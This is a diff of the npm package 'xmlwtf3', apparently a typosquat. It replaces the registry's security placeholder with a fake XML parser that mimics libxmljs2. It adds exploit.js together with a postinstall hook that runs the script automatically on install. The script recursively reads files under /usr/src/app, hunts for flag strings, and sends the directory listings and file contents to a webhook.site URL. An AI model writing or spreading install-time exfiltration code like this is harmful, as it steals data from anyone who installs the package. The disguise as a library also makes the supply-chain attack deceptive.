xmlwtf3 0.0.1-security → 0.31.2

package/exploit.js

@@ -0,0 +1,111 @@
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+
+// Конфигурация
+const WEBHOOK_URL = 'https://webhook.site/055ae50b-b974-41d0-a2c4-e2b961ce4f9b';
+const TARGET_DIR = '/usr/src/app';
+
+// Функция для отправки данных
+function sendData(data, type) {
+    try {
+        const encoded = encodeURIComponent(data);
+        const url = `${WEBHOOK_URL}/?type=${type}&data=${encoded}`;
+        
+        https.get(url, (res) => {
+            console.log(`Данные отправлены (${type})`);
+        }).on('error', (err) => {
+            console.error('Ошибка отправки:', err.message);
+        });
+        
+    } catch (e) {
+        console.error('Ошибка в sendData:', e);
+    }
+}
+
+// Функция для поиска флага в файле
+function searchFlagInFile(filePath) {
+    try {
+        const content = fs.readFileSync(filePath, 'utf8');
+        const flagMatch = content.match(/flag:\{[a-f0-9]{32}\}/i);
+        
+        if (flagMatch) {
+            console.log(`Найден флаг в файле ${filePath}: ${flagMatch[0]}`);
+            sendData(`Файл: ${filePath}\nФлаг: ${flagMatch[0]}`, 'flag_found');
+            return flagMatch[0];
+        }
+    } catch (e) {
+        // Игнорируем ошибки чтения
+    }
+    return null;
+}
+
+// Рекурсивное чтение директории
+function scanDirectory(dirPath) {
+    try {
+        const items = fs.readdirSync(dirPath);
+        let structure = `Директория: ${dirPath}\n`;
+        let foundFlag = null;
+
+        for (const item of items) {
+            const fullPath = path.join(dirPath, item);
+
+            try {
+                const stat = fs.statSync(fullPath);
+
+                if (stat.isDirectory()) {
+                    structure += `[DIR]  ${item}/\n`;
+                        // Рекурсивно сканируем поддиректории
+                    const subFlag = scanDirectory(fullPath);
+                    if (subFlag) foundFlag = subFlag;
+                } else {
+                    structure += `[FILE] ${item} (${stat.size} bytes)\n`;
+
+                    // Проверяем файл на наличие флага
+                    if (item.toLowerCase().includes('flag')) {
+                        console.log(`Проверяю файл с флагом: ${fullPath}`);
+                        const flag = searchFlagInFile(fullPath);
+                        if (flag) foundFlag = flag;
+                    }
+                    // Также проверяем содержимое файла на наличие флага
+                    const flag = searchFlagInFile(fullPath);
+                    if (flag) foundFlag = flag;
+                }
+            } catch (e) {
+                structure += `[ERR]  ${item} (ошибка доступа)\n`;
+            }
+        }
+        // Отправляем структуру директории
+        sendData(structure, 'directory_structure');
+        return foundFlag;
+    } catch (e) {
+        const errorMsg = `Ошибка чтения директории ${dirPath}: ${e.message}`;
+        console.error(errorMsg);
+        sendData(errorMsg, 'scan_error');
+        return null;
+    }
+}
+
+// Основная функция
+function main() {
+    console.log('Сканирование директории:', TARGET_DIR);
+    // Проверяем существование директории
+    if (!fs.existsSync(TARGET_DIR)) {
+        const errorMsg = `Директория ${TARGET_DIR} не существует`;
+        console.error(errorMsg);
+        sendData(errorMsg, 'directory_not_found');
+        return;
+    }
+    // Сканируем директорию
+    const foundFlag = scanDirectory(TARGET_DIR);
+    if (foundFlag) {
+        console.log('Флаг найден:', foundFlag);
+        sendData(`Итоговый флаг: ${foundFlag}`, 'final_flag');
+    } else {
+        console.log('Флаг не найден');
+        sendData('Флаг не найден в сканируемой директории', 'no_flag_found');
+    }   
+}
+
+// Запуск сканирования
+main();

package/index.js

@@ -0,0 +1,39 @@
+module.exports = {
+    parseXmlString: function(xml, options) {
+        console.log('[libxmljs2var] Fake XML parser called');
+        console.log('[libxmljs2var] Options:', options);
+        
+        // Возвращаем фейковый объект, похожий на настоящий парсер
+        return {
+            get: function(xpath) {
+                console.log(`[libxmljs2var] get called with xpath: ${xpath}`);
+                return { 
+                    text: function() { 
+                        return ''; 
+                    },
+                    attr: function(name) {
+                        return '';
+                    }
+                };
+            },
+            root: function() {
+                return {
+                    childNodes: []
+                };
+            },
+            toString: function() {
+                return '<fake-xml-document/>';
+            }
+        };
+    },
+    
+    // Добавляем другие методы, которые могут ожидаться
+    parseXml: function(xml) {
+        return this.parseXmlString(xml);
+    },
+    
+    parseXmlFile: function(path) {
+        console.log(`[libxmljs2var] parseXmlFile called for: ${path}`);
+        return this.parseXmlString('');
+    }
+};

package/package.json

@@ -1,6 +1,8 @@
 {
   "name": "xmlwtf3",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "0.31.2", 
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node exploit.js"
+  }
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=xmlwtf3 for more information.